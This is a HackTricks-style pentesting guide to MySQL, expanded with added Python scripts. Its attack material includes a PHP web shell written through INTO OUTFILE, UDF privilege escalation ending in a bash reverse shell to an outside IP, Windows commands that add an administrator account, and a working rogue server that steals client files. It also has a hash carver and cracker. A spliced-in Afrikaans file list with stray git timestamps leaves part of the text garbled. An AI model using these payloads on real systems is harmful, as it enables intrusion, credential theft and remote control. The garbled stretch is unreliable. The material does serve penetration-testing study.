# 3306 - Pentesting Mysql

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF**, check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.

{% embed url="https://www.rootedcon.com/" %}

## **Basic Information**

**MySQL** can be described as an open source **Relational Database Management System (RDBMS)** that is available for free. It operates on the **Structured Query Language (SQL)**, enabling the management and manipulation of databases.

**Default port:** 3306

```
3306/tcp open mysql
```

## **Connect**

### **Local**

```bash
mysql -u root # Connect to root without password
mysql -u root -p # A password will be prompted for
```

### Remote

MySQL can also be reached over the network, so anyone who knows the server's address and port can try to authenticate with an ordinary client. Whether that works depends on the server's `bind-address` (a loopback address limits it to local clients), on the host part of each account (`'user'@'localhost'` cannot log in remotely, `'user'@'%'` can) and on any firewall in front of port 3306. Remotely reachable accounts with weak passwords are exactly what the brute-force tools further down go after, and an unpatched server adds the known bugs on top, so these checks belong together.

```bash
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
```

## External Enumeration

Some of the enumeration actions require valid credentials

```bash
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
```
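The nmap `mysql-info` script and the `mysql_version` module above get the version, the authentication plugin and the TLS capability from the server's very first packet, before any credentials are sent. The following Python script, an added example that is not part of the original page or of either tool, parses that `Protocol::HandshakeV10` greeting by hand; `parse_handshake`, `build_handshake` and `grab_banner` are this example's own names, and the two sample packets are constructed here rather than captured from a server.

```python
import socket
import struct

# Capability flag bits from the MySQL client/server protocol
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


def parse_handshake(packet: bytes) -> dict:
    """Parse the server's first packet (Protocol::HandshakeV10, 4-byte header included) into the
    fields that matter for enumeration, or report the error if the server refused us outright."""
    length = int.from_bytes(packet[:3], "little")
    p = packet[4:4 + length]
    if not p:
        raise ValueError("empty packet")
    if p[0] == 0xFF:                                   # ERR packet instead of a greeting
        code = struct.unpack_from("<H", p, 1)[0]
        return {"error": code, "message": p[3:].decode(errors="replace")}
    if p[0] != 0x0A:
        raise ValueError(f"unsupported handshake protocol version {p[0]}")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()
    off = end + 1
    conn_id = struct.unpack_from("<I", p, off)[0]
    salt = p[off + 4:off + 12]                         # auth-plugin-data-part-1, then a filler byte
    off += 13
    cap_lo, charset, status, cap_hi = struct.unpack_from("<HBHH", p, off)
    off += 7
    caps = (cap_hi << 16) | cap_lo
    plugin_data_len = p[off] if caps & CLIENT_PLUGIN_AUTH else 0
    off += 11                                          # that byte plus 10 reserved bytes
    if caps & CLIENT_SECURE_CONNECTION:
        n = max(13, plugin_data_len - 8)               # auth-plugin-data-part-2
        salt += p[off:off + n]
        off += n
    salt = salt[:plugin_data_len - 1] if plugin_data_len else salt.rstrip(b"\x00")
    plugin = None
    if caps & CLIENT_PLUGIN_AUTH:
        term = p.find(b"\x00", off)
        plugin = p[off:term if term >= 0 else None].decode()
    return {"version": version, "connection_id": conn_id, "auth_plugin": plugin, "salt": salt,
            "ssl": bool(caps & CLIENT_SSL), "protocol41": bool(caps & CLIENT_PROTOCOL_41),
            "charset": charset, "status": status}


def build_handshake(version: str, conn_id: int, salt: bytes, caps: int, plugin: str) -> bytes:
    """Constructed greeting for offline use; mirrors the layout parse_handshake() reads."""
    assert len(salt) == 20
    body = (b"\x0a" + version.encode() + b"\x00" + struct.pack("<I", conn_id) + salt[:8] + b"\x00"
            + struct.pack("<HBHH", caps & 0xFFFF, 0xFF, 0x0002, caps >> 16)
            + bytes([len(salt) + 1]) + b"\x00" * 10 + salt[8:] + b"\x00" + plugin.encode() + b"\x00")
    return len(body).to_bytes(3, "little") + b"\x00" + body


# Both samples are constructed here, not captured from a real server.
SAMPLE = build_handshake("8.0.36", 42, b"abcdefghijklmnopqrst",
                         CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH,
                         "caching_sha2_password")
_err = b"\xff" + struct.pack("<H", 1130) + b"Host '10.0.0.5' is not allowed to connect to this MySQL server"
ERR_SAMPLE = len(_err).to_bytes(3, "little") + b"\x00" + _err


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def grab_banner(host: str, port: int = 3306, timeout: float = 5.0) -> dict:
    """Fetch and parse a live server's greeting. Nothing is sent, so no credentials are needed
    (this is what nmap's mysql-info and Metasploit's mysql_version read)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        hdr = _recv_exact(s, 4)
        body = _recv_exact(s, int.from_bytes(hdr[:3], "little"))
    return parse_handshake(hdr + body)


if __name__ == "__main__":
    import sys
    print(grab_banner(sys.argv[1]) if len(sys.argv) > 1 else parse_handshake(SAMPLE))
```

Run it with a host argument to fingerprint a live server; with no argument it parses the constructed sample. A server that answers with an ERR packet instead of a greeting (typically error 1130, host not allowed) still reveals that it is MySQL, and `auth_plugin` tells you in advance whether the stored hashes will be `mysql_native_password` (cheap to crack) or `caching_sha2_password`.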

### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#mysql)

### Write any binary data

```bash
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
```

## **MySQL commands**

```bash
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
select version(); #version
select @@version; #version (system variable, so no parentheses)
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## You need the FILE privilege to read & write files, and secure_file_priv decides where (empty = anywhere, NULL = disabled)
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root'; #MySQL <= 5.6 (Password column)
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root'; #MySQL 5.7 / MariaDB; MySQL 8 removed PASSWORD(), use ALTER USER ... IDENTIFIED BY instead
FLUSH PRIVILEGES;
quit;
```
```bash
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
```

### MySQL Permissions Enumeration

Finding out what the account you authenticated with can actually do decides the rest of the engagement: `FILE` is what makes `load_file()` and `INTO OUTFILE` work, `INSERT` on the `mysql` schema is what `CREATE FUNCTION ... SONAME` needs, and `UPDATE` on `mysql.user` (plus `RELOAD` for `FLUSH PRIVILEGES`) lets you reset any account's password. The queries below list the accounts, the grants of one of them, and what the current account can see (`SHOW GRANTS` takes no `LIKE` filter; grep its output client-side).

```sql
SELECT user,host FROM mysql.user;          -- accounts
SHOW GRANTS FOR 'username'@'localhost';    -- grants of one account
SHOW DATABASES;                            -- schemas visible to the current account
SHOW TABLES FROM dbname;                   -- tables visible in a schema
SHOW COLUMNS FROM dbname.tablename;        -- columns visible in a table
```

```sql
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
# Functions not from the sys db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
```

You can see in the documentation the meaning of each privilege: [https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html](https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html#priv\_execute)

### MySQL File RCE

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %}
[mysql-ssrf.md](../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
{% endcontent-ref %}

## MySQL arbitrary read of file by client

Actually, when you try to **load data local into a table**, the MySQL or MariaDB server asks the **client to read the file** and send its content. **So if you can tamper with a mysql client to make it connect to your own MySQL server, you can read arbitrary files from the client's machine.**\
Please note that this is the behaviour when using:

```bash
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
```

(Notice the "local" word)\
Because without the "local" you can get:

```bash
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
```

**Initial PoC:** [**https://github.com/allyshka/Rogue-MySql-Server**](https://github.com/allyshka/Rogue-MySql-Server)\
**In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\
**Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/)
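The exchange described above, as an added example that is not part of the original page or of the linked PoC: a minimal rogue server in Python and a stand-in victim client, run against each other over a socketpair so the whole protocol flow can be seen offline. Names such as `rogue_serve`, `victim_client` and `demo`, the greeting bytes and the fake `/etc/passwd` content are all constructed for this example.

```python
import socket
import struct
import threading

CLIENT_LOCAL_FILES = 0x00000080          # client is willing to send files when asked
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000


def packet(seq: int, payload: bytes) -> bytes:
    """Frame a payload with the 3-byte little-endian length and 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def read_packet(sock):
    hdr = recv_exact(sock, 4)
    return hdr[3], recv_exact(sock, int.from_bytes(hdr[:3], "little"))


SERVER_CAPS = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_LOCAL_FILES
# Hand-built Protocol::HandshakeV10 greeting (constructed for this example): no plugin auth and
# no CLIENT_SSL, so the victim neither negotiates TLS nor gets a real password challenge.
GREETING = (b"\x0a" + b"5.7.44-rogue\x00"                     # protocol 10, server version
            + struct.pack("<I", 7) + b"A" * 8 + b"\x00"          # thread id, salt part 1, filler
            + struct.pack("<HBH", SERVER_CAPS & 0xFFFF, 0x21, 2)  # caps (low), charset, status
            + struct.pack("<H", SERVER_CAPS >> 16) + b"\x00"     # caps (high), auth data len
            + b"\x00" * 10 + b"B" * 12 + b"\x00")                # reserved, salt part 2
OK_PACKET = b"\x00\x00\x00\x02\x00\x00\x00"                  # OK, 0 rows, status AUTOCOMMIT


def rogue_serve(sock, wanted: str):
    """Server side on one victim connection: greet, 'accept' any credentials, answer the first
    query with a LOCAL INFILE request for `wanted` and collect what the client sends back."""
    sock.sendall(packet(0, GREETING))
    _, login = read_packet(sock)                                 # HandshakeResponse41
    client_caps = struct.unpack_from("<I", login, 0)[0]
    sock.sendall(packet(2, OK_PACKET))                           # login always succeeds
    if not client_caps & CLIENT_LOCAL_FILES:
        return client_caps, b""                                  # client refuses LOCAL INFILE: nothing to read
    read_packet(sock)                                            # COM_QUERY; its text does not matter
    sock.sendall(packet(1, b"\xfb" + wanted.encode()))           # LOCAL INFILE Request
    data, seq = b"", 1
    while True:
        seq, chunk = read_packet(sock)
        if not chunk:                                            # empty packet terminates the file
            break
        data += chunk
    sock.sendall(packet(seq + 1, OK_PACKET))
    return client_caps, data


def victim_client(sock, files: dict):
    """Client side, as a client with local_infile enabled behaves: log in, run one query and
    obediently upload whatever file the server names. `files` stands in for its disk."""
    read_packet(sock)                                            # greeting
    caps = CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_LOCAL_FILES
    login = struct.pack("<IIB", caps, 1 << 24, 0x21) + b"\x00" * 23 + b"victim\x00" + b"\x00"
    sock.sendall(packet(1, login))
    read_packet(sock)                                            # OK
    sock.sendall(packet(0, b"\x03select @@version_comment limit 1"))  # what the mysql CLI sends first
    seq, resp = read_packet(sock)
    if resp[:1] != b"\xfb":
        return
    content = files.get(resp[1:].decode(), b"")                 # a real client would open() this path
    if content:
        seq += 1
        sock.sendall(packet(seq, content))
    sock.sendall(packet(seq + 1, b""))
    read_packet(sock)                                            # final OK


def demo(wanted: str = "/etc/passwd") -> bytes:
    """Run both sides over a socketpair (no network needed); return what the rogue server got."""
    fake_disk = {"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"}   # constructed victim file
    server_end, client_end = socket.socketpair()
    result = {}

    def serve():
        result["caps"], result["data"] = rogue_serve(server_end, wanted)

    t = threading.Thread(target=serve)
    t.start()
    victim_client(client_end, fake_disk)
    t.join()
    server_end.close()
    client_end.close()
    return result["data"]


if __name__ == "__main__":
    print(demo())
```

The server answers the client's first query, whatever it is, with the `0xFB` LOCAL INFILE request, so the victim never has to run `LOAD DATA LOCAL` itself: any connection is enough. Two caveats a real run hits: the client must have `local_infile` enabled (the `CLIENT_LOCAL_FILES` bit in its login packet, which `rogue_serve` checks; the `mysql` CLI and most connectors ship with it off nowadays), and a client that insists on TLS will abort because this greeting does not advertise `CLIENT_SSL`.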
## POST

### MySQL user

It will be very interesting if mysql is running as **root**:

```bash
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o "user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
```

#### Dangerous settings in mysqld.cnf

In the configuration of MySQL services, several settings define how it runs and which security measures apply:

* The **`user`** setting specifies the OS user `mysqld` runs as; `root` here turns any file write or UDF from SQL into root on the host.
* **`password`** sets the password associated with the MySQL user (in a `[client]` section it is a plaintext credential on disk).
* **`admin_address`** specifies the IP address that listens for TCP/IP connections on the administrative network interface.
* The **`debug`** variable indicates the current debugging configuration, which can put sensitive information into log files.
* **`sql_warnings`** controls whether information strings are generated for single-row INSERT statements when warnings occur, which can again leak sensitive data into log files.
* **`secure_file_priv`** restricts where data import and export operations (`LOAD DATA`, `SELECT ... INTO OUTFILE`, `LOAD_FILE()`) may read and write; an empty value removes the restriction entirely, `NULL` disables them.
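A quick way to check the settings above on a harvested `my.cnf`/`mysqld.cnf`, as an added example that is not part of the original page: a small parser and audit in Python. The two embedded configs are constructed (one with the weak values, one hardened), and the function names are this example's own.

```python
import configparser


def load_mysql_cnf(text: str) -> dict:
    """Parse my.cnf-style text into {section: {option: value}}.
    mysqld treats '-' and '_' in option names as the same, so both are normalised to '_';
    '!include' / '!includedir' directives are dropped because configparser cannot follow them."""
    cp = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.optionxform = lambda opt: opt.strip().lower().replace("-", "_")
    cp.read_string("\n".join(l for l in text.splitlines() if not l.lstrip().startswith("!")))
    return {section: dict(cp.items(section)) for section in cp.sections()}


def _val(v):
    """Strip quotes; a bare option (no '=') comes back from configparser as None."""
    return None if v is None else v.strip().strip("\"'")


def _is_on(section: dict, key: str) -> bool:
    if key not in section:
        return False
    v = _val(section[key])
    return v is None or v.upper() in ("1", "ON", "TRUE")   # bare "local-infile" means ON


def audit_mysql_cnf(cfg: dict) -> list:
    """Return (severity, finding) pairs for the settings the section above lists as dangerous,
    plus the ones that most often turn a database account into code execution."""
    d = cfg.get("mysqld", {})
    out = []
    if _val(d.get("user", "mysql")) == "root":
        out.append(("high", "user=root: any INTO DUMPFILE or UDF from SQL runs as root"))
    if "skip_grant_tables" in d:
        out.append(("high", "skip-grant-tables: every connection is a passwordless superuser"))
    if "secure_file_priv" in d and _val(d["secure_file_priv"]) == "":
        out.append(("high", 'secure_file_priv="": FILE privilege can read/write any path mysqld can'))
    bind = _val(d.get("bind_address"))
    if bind in (None, "*", "0.0.0.0", "::"):            # server default is to listen everywhere
        out.append(("medium", f"bind_address={bind or '<unset>'}: listening on all interfaces"))
    if _is_on(d, "local_infile"):
        out.append(("medium", "local_infile=ON: server will send LOAD DATA LOCAL file requests to clients"))
    if _is_on(d, "general_log") or "debug" in d:
        out.append(("medium", "general_log/debug enabled: every statement ends up in log files"))
    for section in ("client", "mysql", "mysqldump"):
        if _val(cfg.get(section, {}).get("password")):
            out.append(("high", f"[{section}] password=...: plaintext credential on disk (cf. /etc/mysql/debian.cnf)"))
    return out


# Constructed configs, not from any real host: the weak one beside its hardened counterpart.
WEAK_CNF = """
[client]
password = S3cr3t!
[mysqld]
user = root
bind-address = 0.0.0.0
secure-file-priv = ""
local-infile = 1
general_log = 1
!includedir /etc/mysql/conf.d/
"""

HARDENED_CNF = """
[mysqld]
user = mysql
bind-address = 127.0.0.1
secure-file-priv = /var/lib/mysql-files
local-infile = 0
general_log = 0
"""


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(name, audit_mysql_cnf(load_mysql_cnf(text)) or "no findings")
```

`bind_address` is reported when it is absent because the server then listens on every interface; on MariaDB `local_infile` also defaults to ON, so an absent key there is not the all-clear the script gives it. Point it at every file from the "Useful files" list below, since a `[client]` password in `~/.my.cnf` is as good as the one in `debian.cnf`.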

### Privilege Escalation

```bash
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
## MySQL 5.7+ no longer has a "password" column: select authentication_string instead

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
## "IDENTIFIED BY" inside GRANT was removed in MySQL 8: create the user first, then grant

# Get a shell (with your permissions, useful for sudo/suid privesc)
\! sh
```

### Privilege escalation via library

If the **mysql server is running as root** (or a different, more privileged user) you can make it execute commands. For this, you need to use **user defined functions**. And to create a user defined function you need a **library** for the OS that is running mysql.

The malicious library to use can be found inside sqlmap and inside metasploit by doing **`locate "*lib_mysqludf_sys*"`**. The **`.so`** files are **Linux** libraries and the **`.dll`** are the **Windows** ones, choose the one you need.

If you **don't have** those libraries, you can either **look for them**, or download this [**Linux C code**](https://www.exploit-db.com/exploits/1518) and **compile it inside the vulnerable Linux machine**:

```bash
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

Now that you have the library, login inside MySQL as a privileged user (root?) and follow the next steps:

#### Linux
```sql
# Use a database
use mysql;

# Create a table to load the library and move it to the plugins dir
create table npn(line blob);

# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));

# Get the plugin_dir path
show variables like '%plugin%';
## Both load_file() and INTO DUMPFILE need the FILE privilege, and secure_file_priv must not
## restrict them to a directory other than plugin_dir (check: select @@secure_file_priv;)

# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';

# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

# Execute commands (they run as the OS user mysqld runs as)
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
```

#### Windows

The procedure is the same as on Linux, using the `.dll` build of `lib_mysqludf_sys` (the 32-bit or 64-bit one must match the `mysqld` process). Before trying it, enumerate first: confirm port 3306 is open, get in with whatever you have (brute force, SQL injection in a front-end application, or credentials found on the box) and check with `SHOW GRANTS` that the account has `FILE` and `INSERT` on the `mysql` schema (needed for `CREATE FUNCTION ... SONAME`), otherwise the steps below fail. Once you have command execution the usual post-exploitation applies (add an administrator, dump the database, pivot). The hardening counterpart is the obvious one: strong passwords, least-privilege accounts, up-to-date software, network restrictions on 3306 and log monitoring.

```sql
# Check the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
## Modern servers only load from plugin_dir (typically <basedir>\lib\plugin); writing to system32 only works on old versions
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

### Extracting MySQL credentials from files

Inside _/etc/mysql/debian.cnf_ you can find the **plain-text password** of the user **debian-sys-maint**

```bash
cat /etc/mysql/debian.cnf
```

You can **use these credentials to login in the mysql database**.

Inside the file _/var/lib/mysql/mysql/user.MYD_ you can find **all the hashes of the MySQL users** (the ones that you can extract from mysql.user inside the database)_._

You can extract them doing:

```bash
# "a-Z" is not a valid range in most locales; use a-zA-Z
grep -oaE "[-_\.\*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
```
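As an added example, not from the original page: the carving the `grep` one-liner does, followed by an offline check of the carved `mysql_native_password` hashes against a wordlist, in Python. `SAMPLE_MYD` is a constructed stand-in for a fragment of `user.MYD` (real records have the MyISAM layout around the hash; it is not parsed, only scanned), and the function names are this example's own.

```python
import hashlib
import re

# mysql_native_password hashes as stored in mysql.user / user.MYD: '*' followed by 40 upper-case hex digits
NATIVE_RE = re.compile(rb"\*[0-9A-F]{40}")
# caching_sha2_password (the MySQL 8 default): "$A$005$" + 20 raw salt bytes + 43 base64-ish chars
SHA2_RE = re.compile(rb"\$A\$005\$.{20}[./0-9A-Za-z]{43}", re.DOTALL)


def mysql_native_password(password: str) -> str:
    """'*' + SHA1(SHA1(password)) in upper-case hex, exactly what PASSWORD() used to return."""
    return "*" + hashlib.sha1(hashlib.sha1(password.encode()).digest()).hexdigest().upper()


def extract_hashes(blob: bytes) -> dict:
    """Carve password hashes out of raw bytes (user.MYD, a backup, a memory dump).
    The MyISAM record layout is not parsed: hashes are found by their fixed shape, which is
    what the grep one-liner above does as well."""
    native = sorted({m.decode() for m in NATIVE_RE.findall(blob)})
    sha2 = sorted(set(SHA2_RE.findall(blob)))
    return {"mysql_native_password": native, "caching_sha2_password": sha2}


def crack_native(hashes, wordlist) -> dict:
    """Dictionary attack on mysql_native_password: it is unsalted, so one double-SHA1 per
    candidate is compared against every hash at once. Returns {hash: password}."""
    wanted = {h.upper() for h in hashes}
    found = {}
    for word in wordlist:
        h = mysql_native_password(word)
        if h in wanted:
            found[h] = word
    return found


# Constructed stand-in for a fragment of user.MYD: host/user strings, privilege flags, then the
# hash and plugin name, as they sit next to each other in a real record. Not a real file.
SAMPLE_MYD = (
    b"\x09localhost\x04root" + b"Y" * 29
    + b"\x29*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19\x15mysql_native_password"
    + b"\x00\x01%\x06webapp" + b"N" * 29
    + b"\x29" + mysql_native_password("Winter2024!").encode() + b"\x15mysql_native_password"
    + b"\x01%\x03api" + b"N" * 29
    + b"\x46$A$005$" + bytes(range(1, 21)) + b"A" * 43 + b"\x15caching_sha2_password"
)


if __name__ == "__main__":
    hashes = extract_hashes(SAMPLE_MYD)
    print(hashes)
    print(crack_native(hashes["mysql_native_password"], ["letmein", "password", "Winter2024!"]))
```

`mysql_native_password` is unsalted double-SHA1, so for anything beyond a small wordlist hand the `*...` values to `hashcat -m 300`; `$A$005$` hashes are the MySQL 8 default `caching_sha2_password`, salted and iterated, which is why the script only reports them (hashcat has a separate mode for those).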

### Enable logging

You can enable logging of mysql queries inside `/etc/mysql/my.cnf` by uncommenting the following lines (the `general_log` and `general_log_file` options):

![](<../.gitbook/assets/image (277).png>)

### Nuttige lêers
2024-02-11 02:07:06 +00:00
Konfigurasie-lêers
2022-05-01 13:25:53 +00:00
* windows \*
2024-02-11 02:07:06 +00:00
* config.ini
* my.ini
* windows\my.ini
* winnt\my.ini
* \<InstDir>/mysql/data/
* unix
* my.cnf
* /etc/my.cnf
* /etc/mysql/my.cnf
* /var/lib/mysql/my.cnf
* \~/.my.cnf
* /etc/my.cnf
* Opdraggeskiedenis
* \~/.mysql.history
* Log-lêers
* connections.log
* update.log
* common.log
## Default MySQL Databases/Tables

**information_schema**

ALL\_PLUGINS\
APPLICABLE\_ROLES\
CHARACTER\_SETS\
CHECK\_CONSTRAINTS\
COLLATIONS\
COLLATION\_CHARACTER\_SET\_APPLICABILITY\
COLUMNS\
COLUMN\_PRIVILEGES\
ENABLED\_ROLES\
ENGINES\
EVENTS\
FILES\
GLOBAL\_STATUS\
GLOBAL\_VARIABLES\
KEY\_COLUMN\_USAGE\
KEY\_CACHES\
OPTIMIZER\_TRACE\
PARAMETERS\
PARTITIONS\
PLUGINS\
PROCESSLIST\
PROFILING\
REFERENTIAL\_CONSTRAINTS\
ROUTINES\
SCHEMATA\
SCHEMA\_PRIVILEGES\
SESSION\_STATUS\
SESSION\_VARIABLES\
STATISTICS\
SYSTEM\_VARIABLES\
TABLES\
TABLESPACES\
TABLE\_CONSTRAINTS\
TABLE\_PRIVILEGES\
TRIGGERS\
USER\_PRIVILEGES\
VIEWS\
INNODB\_LOCKS\
INNODB\_TRX\
INNODB\_SYS\_DATAFILES\
INNODB\_FT\_CONFIG\
INNODB\_SYS\_VIRTUAL\
INNODB\_CMP\
INNODB\_FT\_BEING\_DELETED\
INNODB\_CMP\_RESET\
INNODB\_CMP\_PER\_INDEX\
INNODB\_CMPMEM\_RESET\
INNODB\_FT\_DELETED\
INNODB\_BUFFER\_PAGE\_LRU\
INNODB\_LOCK\_WAITS\
INNODB\_TEMP\_TABLE\_INFO\
INNODB\_SYS\_INDEXES\
INNODB\_SYS\_TABLES\
INNODB\_SYS\_FIELDS\
INNODB\_CMP\_PER\_INDEX\_RESET\
INNODB\_BUFFER\_PAGE\
INNODB\_FT\_DEFAULT\_STOPWORD\
INNODB\_FT\_INDEX\_TABLE\
INNODB\_FT\_INDEX\_CACHE\
INNODB\_SYS\_TABLESPACES\
INNODB\_METRICS\
INNODB\_SYS\_FOREIGN\_COLS\
INNODB\_CMPMEM\
INNODB\_BUFFER\_POOL\_STATS\
INNODB\_SYS\_COLUMNS\
INNODB\_SYS\_FOREIGN\
INNODB\_SYS\_TABLESTATS\
GEOMETRY\_COLUMNS\
SPATIAL\_REF\_SYS\
CLIENT\_STATISTICS\
INDEX\_STATISTICS\
USER\_STATISTICS\
INNODB\_MUTEXES\
TABLE\_STATISTICS\
INNODB\_TABLESPACES\_ENCRYPTION\
user\_variables\
INNODB\_TABLESPACES\_SCRUBBING\
INNODB\_SYS\_SEMAPHORE\_WAITS

**mysql**

columns\_priv\
column\_stats\
db\
engine\_cost\
event\
func\
general\_log\
gtid\_executed\
gtid\_slave\_pos\
help\_category\
help\_keyword\
help\_relation\
help\_topic\
host\
index\_stats\
innodb\_index\_stats\
innodb\_table\_stats\
ndb\_binlog\_index\
plugin\
proc\
procs\_priv\
proxies\_priv\
roles\_mapping\
server\_cost\
servers\
slave\_master\_info\
slave\_relay\_log\_info\
slave\_worker\_info\
slow\_log\
tables\_priv\
table\_stats\
time\_zone\
time\_zone\_leap\_second\
time\_zone\_name\
time\_zone\_transition\
time\_zone\_transition\_type\
transaction\_registry\
user

**performance_schema**

accounts\
cond\_instances\
events\_stages\_current\
events\_stages\_history\
events\_stages\_history\_long\
events\_stages\_summary\_by\_account\_by\_event\_name\
events\_stages\_summary\_by\_host\_by\_event\_name\
